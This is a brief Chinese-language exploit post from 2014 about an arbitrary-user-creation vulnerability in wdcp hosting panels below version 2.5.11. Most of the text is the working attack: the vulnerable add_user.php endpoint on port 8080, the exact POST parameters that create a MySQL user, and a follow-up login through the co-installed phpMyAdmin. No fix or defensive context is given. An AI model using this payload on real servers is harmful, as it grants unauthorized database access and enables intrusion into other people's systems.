wdcp_v2.5.11版本以下任意用户添加漏洞 发布于2014年9月26日 影响版本 wdcp_v2.5.11版本以下 利用方法 http://www.xxx.com:8080/mysql/add_user.php 提交以下内容 Submit_add=xxoo&user=xxoo&password=xxoo&dbname=mysql 而且lanmp一键安装的站在wdcp同级目录会有phpmyadmin,所以用phpmyadmin登录,可以看到用刚新增的xxoo用户登录成功。 http://www.xx.com:8080/phpmyadmin/ wdcp